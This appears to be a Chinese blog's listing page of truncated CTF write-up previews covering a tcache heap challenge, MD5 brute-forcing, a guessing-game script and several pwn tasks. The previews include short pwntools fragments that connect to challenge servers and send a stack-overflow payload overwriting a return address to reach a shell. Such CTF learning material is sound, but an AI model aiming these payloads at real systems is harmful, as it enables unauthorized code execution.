5.5k5 分钟

# spn(11.26) 附件下载 复现这道题的时候,我一开始用的是 0RAYS 的解法,大致是找 spn 的解密脚本,计算给出的 shell 的真实地址,然后用 tcache 打 shell,最后选 5 进 backdoor. 虽说是读懂了 0RAYS 的脚本,而且也算是进一步学习了一下 tcache 的机制, 然而我一番搜索,着实找不到好用的 spn 解密脚本,就只好另寻出路. 0RAY 的脚本放上: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515
2.4k2 分钟

文章时间太早,图片丢失 # Crypto-RingRingRing 连上后先是让我们输验证码,MD5,这个没什么好说的,爆破一下就出了。 然后让我们给出满足条件 a**4 + b**4 + c**4 + d**4 = e**2 的 100 个 a,b,c,d,e 依旧是爆破,判断 sqrt(a**4 + b**4 + c**4 + d**4) 的值为整数时,依次输出 a,b,c,d,e 就可以了,输出 100 个之后返回就可以得到 flag from pwn import* from math import sqrt r=remote('192.
7.7k7 分钟

文章时间太早,图片丢失 # Misc-red_vs_blue 简单来说就是 66 轮试错,同一次 nc 里面的答案是一样的,要么输入 r, 要么输入 b,错了就输入 y 重来,因为有时间限制,只能上脚本(本来还想手搓) 123456789101112131415161718192021222324252627282930313233343536373839404142434445from pwn import *# sh=process("./buu--rip") local端sh = remote('node4.buuoj.c
3.5k3 分钟

# pwn1 都说了是测试 nc 了,连上就直接可以拿到 flag # pwn2 给我们个 password,你再传回去就完了 关键是要仔细读题,看仔细到底哪些是 password 1234567from pwn import *r=remote("219.219.61.234",6666 )print(r.recvuntil(b'*\n').decode())p=r.recvuntil(b'\n')[:-1]print(bytes(p))r.sendline(bytes(p))r.interactive() #
7.3k7 分钟

# PWN # pwn1 nc 连上 直接 cat flag # pwn2 经典栈溢出 123456789from pwn import *#r=process("./pwn2")r=remote('1.15.81.218',10001)p=b'a' * 72 + p64(0x400596)r.sendline(p)r.interactive() 直接传就行了... # pwn3 开了 NX 保护,没开金丝雀 有个 echo flag,感觉像是那么回事,实际上没用, 所以还是得通过 syst